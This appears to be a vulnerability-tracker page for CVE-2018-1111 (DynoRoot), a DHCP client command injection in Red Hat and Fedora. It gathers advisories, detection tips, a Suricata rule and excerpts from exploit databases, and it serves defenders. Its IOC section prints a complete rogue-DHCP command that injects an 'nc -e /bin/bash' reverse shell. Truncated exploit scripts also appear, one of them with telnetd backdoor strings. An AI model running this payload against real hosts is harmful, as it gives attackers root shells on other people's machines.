CVE-2018-1111
published 2018-05-17CVE-2018-1111: DHCP packages in Red Hat Enterprise Linux 6 and 7, Fedora 28, and earlier are vulnerable to a command injection flaw in the NetworkManager integration script…
PriorityP277high7.5CVSS 3.0
AVAACHPRNUINSUCHIHAH
ITWEXPLOIT
Exploited in the wild
EPSS
94.46%
99.8th percentile
DHCP packages in Red Hat Enterprise Linux 6 and 7, Fedora 28, and earlier are vulnerable to a command injection flaw in the NetworkManager integration script included in the DHCP client. A malicious DHCP server, or an attacker on the local network able to spoof DHCP responses, could use this flaw to execute arbitrary commands with root privileges on systems using NetworkManager and configured to obtain network configuration using the DHCP protocol.
Affected
26 ranges· showing 25
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| fedora | dhcp | — | — |
| fedoraproject | fedora | — | — |
| fedoraproject | fedora | — | — |
| fedoraproject | fedora | — | — |
| paloalto | pan-os | — | — |
| red_hat | dhcp | — | — |
| red_hat | dhcp | — | — |
| redhat | enterprise_linux | — | — |
| redhat | enterprise_linux | — | — |
| redhat | enterprise_linux | — | — |
| redhat | enterprise_linux | — | — |
| redhat | enterprise_linux | — | — |
| redhat | enterprise_linux | — | — |
| redhat | enterprise_linux | — | — |
| redhat | enterprise_linux | — | — |
| redhat | enterprise_linux | — | — |
| redhat | enterprise_linux | — | — |
| redhat | enterprise_linux_desktop | — | — |
| redhat | enterprise_linux_desktop | — | — |
| redhat | enterprise_linux_server | — | — |
| redhat | enterprise_linux_server | — | — |
| redhat | enterprise_linux_workstation | — | — |
| redhat | enterprise_linux_workstation | — | — |
| redhat | enterprise_virtualization | — | — |
| redhat | enterprise_virtualization | — | — |
Detection & IOCsextracted from sources · hover to see the quote
commanddnsmasq --interface=eth0 --bind-interfaces --except-interface=lo --dhcp-range=10.1.1.1,10.1.1.10,1h --conf-file=/dev/null --dhcp-option=6,10.1.1.1 --dhcp-option=3,10.1.1.1 --dhcp-option="252,x'&nc -e /bin/bash 10.1.1.1 1337 #"↗
- →Alert on execution of /etc/NetworkManager/dispatcher.d/11-dhclient spawning unexpected child processes (e.g., nc, bash, touch) with root privileges, as this is the script exploited by the vulnerability. ↗
- →Detect the DHCP4_WPAD environment variable being set to a value containing shell metacharacters (', &, |, ;) before the 11-dhclient script is executed. ↗
- →Palo Alto Networks customers can use IPS signature 40739 to detect/block exploitation attempts against this vulnerability. ↗
- →Look for the pattern x'&<command> # in DHCP option 252 payloads on the wire; this is the canonical injection format used in both the PoC and Metasploit module. ↗
- →It is important to note that other characters may be used to perform this attack, such as | or ;, in addition to the & character demonstrated in the primary PoC. ↗
- ·The vulnerability only affects systems where NetworkManager is running AND DHCP is configured as the network configuration method. Systems not using NetworkManager with DHCP are not impacted. ↗
- ·Red Hat Enterprise Virtualization 4.1 ships vulnerable components but is not impacted in its default configuration because NetworkManager is turned off in the Management Appliance and not used with DHCP in the Hypervisor. ↗
- ·RHEL 5 and RHEL 8 dhcp packages are NOT affected; only RHEL 6 and 7 (and derivatives such as CentOS 6/7, Fedora 26/27/28) are vulnerable. ↗
CVSS provenance
nvdv3.07.5HIGHCVSS:3.0/AV:A/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.9HIGHAV:A/AC:M/Au:N/C:C/I:C/A:C
vendor_redhat7.5HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Palo Alto
PAN-SA-2025-0006 Informational Bulletin: Impact of OSS CVEs in PAN-OS
vendor_paloalto·2025-02-12·CVSS 7.1
CVE-2015-5312 [HIGH] PAN-SA-2025-0006 Informational Bulletin: Impact of OSS CVEs in PAN-OS
PAN-SA-2025-0006 Informational Bulletin: Impact of OSS CVEs in PAN-OS
T he Palo Alto Networks Product Security Assurance team has evaluated the following open source software (OSS) CVEs as they relate to PAN-OS software. While PAN-OS software may include the
CVEs: CVE-2015-5312, CVE-2016-4607, CVE-2016-4608, CVE-2016-4609, CVE-2016-4738, CVE-2018-1111, CVE-2018-14634, CVE-2018-18653, CVE-2019-0145, CVE-2019-8331, CVE-2020-0599, CVE-2020-14343, CVE-2020-14779, CVE-2020-27844, CVE-2020-29569, CVE-2021-21315, CVE-2021-27853, CVE-2021-27854, CVE-2021-27861, CVE-2021-27862, CVE-2021-3618, CVE-2021-3711, CVE-2022-2097, CVE-2022-22816, CVE-2022-40303, CVE-2022-41723, CVE-2022-41741, CVE-2022-41742, CVE-2023-3247, CVE-2023-38408, CVE-2023-44466, CVE-2023-50781, CVE-2023-50782, CVE-2024-12084, CV
Red Hat
dhcp: Command injection vulnerability in the DHCP client NetworkManager integration script
vendor_redhat·2018-05-15·CVSS 7.5
CVE-2018-1111 [HIGH] CWE-77 dhcp: Command injection vulnerability in the DHCP client NetworkManager integration script
dhcp: Command injection vulnerability in the DHCP client NetworkManager integration script
DHCP packages in Red Hat Enterprise Linux 6 and 7, Fedora 28, and earlier are vulnerable to a command injection flaw in the NetworkManager integration script included in the DHCP client. A malicious DHCP server, or an attacker on the local network able to spoof DHCP responses, could use this flaw to execute arbitrary commands with root privileges on systems using NetworkManager and configured to obtain network configuration using the DHCP protocol.
A command injection flaw was found in the NetworkManager integration script included in the DHCP client packages in Red Hat Enterprise Linux. A malicious DHCP server, or an attacker on the local network able to spoof DHCP responses, could use this flaw t
GHSA
GHSA-5jw9-5ff9-vr5p: DHCP packages in Red Hat Enterprise Linux 6 and 7, Fedora 28, and earlier are vulnerable to a command injection flaw in the NetworkManager integration
ghsa_unreviewed·2022-05-13
CVE-2018-1111 [HIGH] CWE-77 GHSA-5jw9-5ff9-vr5p: DHCP packages in Red Hat Enterprise Linux 6 and 7, Fedora 28, and earlier are vulnerable to a command injection flaw in the NetworkManager integration
DHCP packages in Red Hat Enterprise Linux 6 and 7, Fedora 28, and earlier are vulnerable to a command injection flaw in the NetworkManager integration script included in the DHCP client. A malicious DHCP server, or an attacker on the local network able to spoof DHCP responses, could use this flaw to execute arbitrary commands with root privileges on systems using NetworkManager and configured to obtain network configuration using the DHCP protocol.
Suricata
ET EXPLOIT DynoRoot DHCP - Client Command Injection
suricata·2018-06-29
CVE-2018-1111 ET EXPLOIT DynoRoot DHCP - Client Command Injection
ET EXPLOIT DynoRoot DHCP - Client Command Injection
Rule: alert udp any 67 -> any 68 (msg:"ET EXPLOIT DynoRoot DHCP - Client Command Injection"; content:"|02|"; depth:1; content:"|35 01 05 fc|"; distance:0; content:"|2f|bin|2f|sh"; fast_pattern; distance:0; reference:url,exploit-db.com/exploits/44652/; reference:cve,2018-1111; classtype:attempted-admin; sid:2025765; rev:2; metadata:attack_target Networking_Equipment, created_at 2018_06_29, cve CVE_2018_1111, deployment Datacenter, performance_impact Low, confidence Medium, signature_severity Critical, updated_at 2019_07_26, reviewed_at 2024_04_03, mitre_tactic_id TA0008, mitre_tactic_name Lateral_Movement, mitre_technique_id T1210, mitre_technique_name Exploitation_Of_Remote_Services;)
Exploit-DB
DHCP Client - Command Injection 'DynoRoot' (Metasploit)
exploitdb·2018-06-13·CVSS 7.5
CVE-2018-1111 [HIGH] DHCP Client - Command Injection 'DynoRoot' (Metasploit)
DHCP Client - Command Injection 'DynoRoot' (Metasploit)
---
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule 'DHCP Client Command Injection (DynoRoot)',
'Description' => %q{
This module exploits the DynoRoot vulnerability, a flaw in how the
NetworkManager integration script included in the DHCP client in
Red Hat Enterprise Linux 6 and 7, Fedora 28, and earlier
processes DHCP options. A malicious DHCP server, or an attacker on
the local network able to spoof DHCP responses, could use this flaw
to execute arbitrary commands with root privileges on systems using
NetworkManager and configured to obtain network configuration using
the DHCP protocol.
},
'Author' =>
[
'Felix Wilhelm'
Exploit-DB
DynoRoot DHCP Client - Command Injection
exploitdb·2018-05-18·CVSS 7.5
CVE-2018-1111 [HIGH] DynoRoot DHCP Client - Command Injection
DynoRoot DHCP Client - Command Injection
---
# Exploit Title: DynoRoot DHCP - Client Command Injection
# Date: 2018-05-18
# Exploit Author: Kevin Kirsche
# Exploit Repository: https://github.com/kkirsche/CVE-2018-1111
# Exploit Discoverer: Felix Wilhelm
# Vendor Homepage: https://www.redhat.com/
# Version: RHEL 6.x / 7.x and CentOS 6.x/7.x
# Tested on: CentOS Linux release 7.4.1708 (Core) / NetworkManager 1.8.0-11.el7_4
# CVE : CVE-2018-1111
#!/usr/bin/env python
from argparse import ArgumentParser
from scapy.all import BOOTP_am, DHCP
from scapy.base_classes import Net
class DynoRoot(BOOTP_am):
function_name = "dhcpd"
def make_reply(self, req):
resp = BOOTP_am.make_reply(self, req)
if DHCP in req:
dhcp_options = [(op[0], {1: 2, 3: 5}.get(op[1], op[1]))
for op in req[DHCP].options
if
Exploit-DB
RAVPower 2.000.056 - Root Remote Code Execution
exploitdb·2018-01-24·CVSS 9.8
CVE-2018-5997 [CRITICAL] RAVPower 2.000.056 - Root Remote Code Execution
RAVPower 2.000.056 - Root Remote Code Execution
---
"""
# Exploit Title: RAVPower - remote root
# Date: 23/01/2018
# Exploit Authors: Daniele Linguaglossa
# Vendor Homepage: https://www.ravpower.com/
# Software Link: https://www.ravpower.com/
# Version: 2.000.056
# Tested on: OSX
# CVE : CVE-2018-5997
"""
import requests
import time
import telnetlib
PATH_PASSWD = "/etc"
FILE_PASSWD = "passwd"
PATH_VSTFUNC = "/etc/init.d"
FILE_VSTFUNC = "vstfunc"
FILE_RC = "/etc/rc.d/rc"
BACKDOOR_TERM = "export TERM=xterm"
BACKDOOR_TELNET = "/usr/sbin/telnetd &"
BASH_SHEBANG = "#!/bin/sh"
TELNETD = "/usr/sbin/telnetd -p 1111 &"
def upload(host, port, path, name, content):
user_agent = "Mozilla/5.0 (X11; Linux x86_64; rv:57.0) Gecko/20100101 Firefox/57.0"
path = "/upload.csp?uploadpath=%s&file=15158
Metasploit
DHCP Client Command Injection (DynoRoot)
metasploit
DHCP Client Command Injection (DynoRoot)
DHCP Client Command Injection (DynoRoot)
This module exploits the DynoRoot vulnerability, a flaw in how the NetworkManager integration script included in the DHCP client in Red Hat Enterprise Linux 6 and 7, Fedora 28, and earlier processes DHCP options. A malicious DHCP server, or an attacker on the local network able to spoof DHCP responses, could use this flaw to execute arbitrary commands with root privileges on systems using NetworkManager and configured to obtain network configuration using the DHCP protocol.
Bugzilla
CVE-2018-1111 dhcp: Command injection vulnerability in the DHCP client NetworkManager integration script [fedora-all]
bugzilla·2018-05-15·CVSS 7.5
CVE-2018-1111 [HIGH] CVE-2018-1111 dhcp: Command injection vulnerability in the DHCP client NetworkManager integration script [fedora-all]
CVE-2018-1111 dhcp: Command injection vulnerability in the DHCP client NetworkManager integration script [fedora-all]
This is an automatically created tracking bug! It was created to ensure
that one or more security vulnerabilities are fixed in affected versions
of fedora-all.
For comments that are specific to the vulnerability please use bugs filed
against the "Security Response" product referenced in the "Blocks" field.
For more information see:
http://fedoraproject.org/wiki/Security/TrackingBugs
When submitting as an update, use the fedpkg template provided in the next
comment(s). This will include the bug IDs of this tracking bug as well as
the relevant top-level CVE bugs.
Please also mention the CVE IDs being fixed in the RPM changelog and the
fedpkg commit message.
NOTE: this i
Bugzilla
CVE-2018-1111 dhcp: Command injection vulnerability in the DHCP client NetworkManager integration script
bugzilla·2018-04-16·CVSS 7.5
CVE-2018-1111 [HIGH] CVE-2018-1111 dhcp: Command injection vulnerability in the DHCP client NetworkManager integration script
CVE-2018-1111 dhcp: Command injection vulnerability in the DHCP client NetworkManager integration script
A command injection vulnerability was found in 11-dhclient script provided by dhcp-client located in /etc/NetworkManager/dispatcher.d/11-dhclient. Attacker in local network who is able to spoof DHCP responses or malicious DHCP server can execute arbitrary commands run with root privileges on client system by exploiting this vulnerability.
Discussion:
Acknowledgments:
Name: Felix Wilhelm (Google Security Team)
---
Mitigation:
Please access https://access.redhat.com/security/vulnerabilities/3442151 for information on how to mitigate this issue.
---
External References:
https://access.redhat.com/security/vulnerabilities/3442151
---
(In reply to Adam Mariš from comment #0)
> A c
Unit42
Analysis of the DHCP Client Script Code Execution Vulnerability (CVE-2018-1111)
blogs_unit42·2018-07-16·CVSS 7.5
CVE-2018-1111 [HIGH] Analysis of the DHCP Client Script Code Execution Vulnerability (CVE-2018-1111)
In May 2018, a command injection flaw was found in the NetworkManager integration script included in the DHCP client packages in multiple versions of Red Hat Enterprise Linux (CVE-2018-1111), which has since been patched. An attacker could attack this vulnerability either through the use of a malicious DHCP server, or malicious, spoofed DHCP responses on the local network. A successful attack could execute arbitrary commands with root privileges on systems using NetworkManager with DHCP configured.
This vulnerability poses a serious threat to individuals or organizations running vulnerable instance of Red Hat Enterprise Linux versions 6 or 7 and patches should be applied immediately.
This blog post serves to help with your risk assessment and understanding of the vulnerability by providi
Unit42
Analysis of the DHCP Client Script Code Execution Vulnerability (CVE-2018-1111)
blogs_unit42·2018-07-16·CVSS 7.5
CVE-2018-1111 [HIGH] Analysis of the DHCP Client Script Code Execution Vulnerability (CVE-2018-1111)
## Analysis of the DHCP Client Script Code Execution Vulnerability (CVE-2018-1111)
Jin Chen
Published: July 16, 2018
Threat Research
Vulnerabilities
CVE-2018-1111
In May 2018, a command injection flaw was found in the NetworkManager integration script included in the DHCP client packages in multiple versions of Red Hat Enterprise Linux ( CVE-2018-1111 ), which has since been patched. An attacker could attack this vulnerability either through the use of a malicious DHCP server, or malicious, spoofed DHCP responses on the local network. A successful attack could execute arbitrary commands with root privileges on systems using NetworkManager with DHCP configured.
This vulnerability poses a serious threat to individuals or organizations running vulnerable instance of Red Hat Enterprise
Tenable
Advisory: Red Hat DHCP Client Command Injection Trouble
blogs_tenable·2018-05-17
Advisory: Red Hat DHCP Client Command Injection Trouble
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
http://www.securityfocus.com/bid/104195http://www.securitytracker.com/id/1040912https://access.redhat.com/errata/RHSA-2018:1453https://access.redhat.com/errata/RHSA-2018:1454https://access.redhat.com/errata/RHSA-2018:1455https://access.redhat.com/errata/RHSA-2018:1456https://access.redhat.com/errata/RHSA-2018:1457https://access.redhat.com/errata/RHSA-2018:1458https://access.redhat.com/errata/RHSA-2018:1459https://access.redhat.com/errata/RHSA-2018:1460https://access.redhat.com/errata/RHSA-2018:1461https://access.redhat.com/errata/RHSA-2018:1524https://access.redhat.com/security/vulnerabilities/3442151https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2018-1111https://help.ecostruxureit.com/display/public/UADCE725/Security+fixes+in+StruxureWare+Data+Center+Expert+v7.6.0https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/CDCLLCHYFFXW354HMB5QBXOQOY5BH2EJ/https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/IDJA4QRR74TMXW34Q3DYYFPVBYRTJBI7/https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/QMTTB54QNTPD2SK6UL32EVQHMZP6BUUD/https://www.exploit-db.com/exploits/44652/https://www.exploit-db.com/exploits/44890/https://www.tenable.com/security/tns-2018-10http://www.securityfocus.com/bid/104195http://www.securitytracker.com/id/1040912https://access.redhat.com/errata/RHSA-2018:1453https://access.redhat.com/errata/RHSA-2018:1454https://access.redhat.com/errata/RHSA-2018:1455https://access.redhat.com/errata/RHSA-2018:1456https://access.redhat.com/errata/RHSA-2018:1457https://access.redhat.com/errata/RHSA-2018:1458https://access.redhat.com/errata/RHSA-2018:1459https://access.redhat.com/errata/RHSA-2018:1460https://access.redhat.com/errata/RHSA-2018:1461https://access.redhat.com/errata/RHSA-2018:1524https://access.redhat.com/security/vulnerabilities/3442151https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2018-1111https://help.ecostruxureit.com/display/public/UADCE725/Security+fixes+in+StruxureWare+Data+Center+Expert+v7.6.0https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/CDCLLCHYFFXW354HMB5QBXOQOY5BH2EJ/https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/IDJA4QRR74TMXW34Q3DYYFPVBYRTJBI7/https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/QMTTB54QNTPD2SK6UL32EVQHMZP6BUUD/https://www.exploit-db.com/exploits/44652/https://www.exploit-db.com/exploits/44890/https://www.tenable.com/security/tns-2018-10
2018-05-17
Published
Exploited in the wild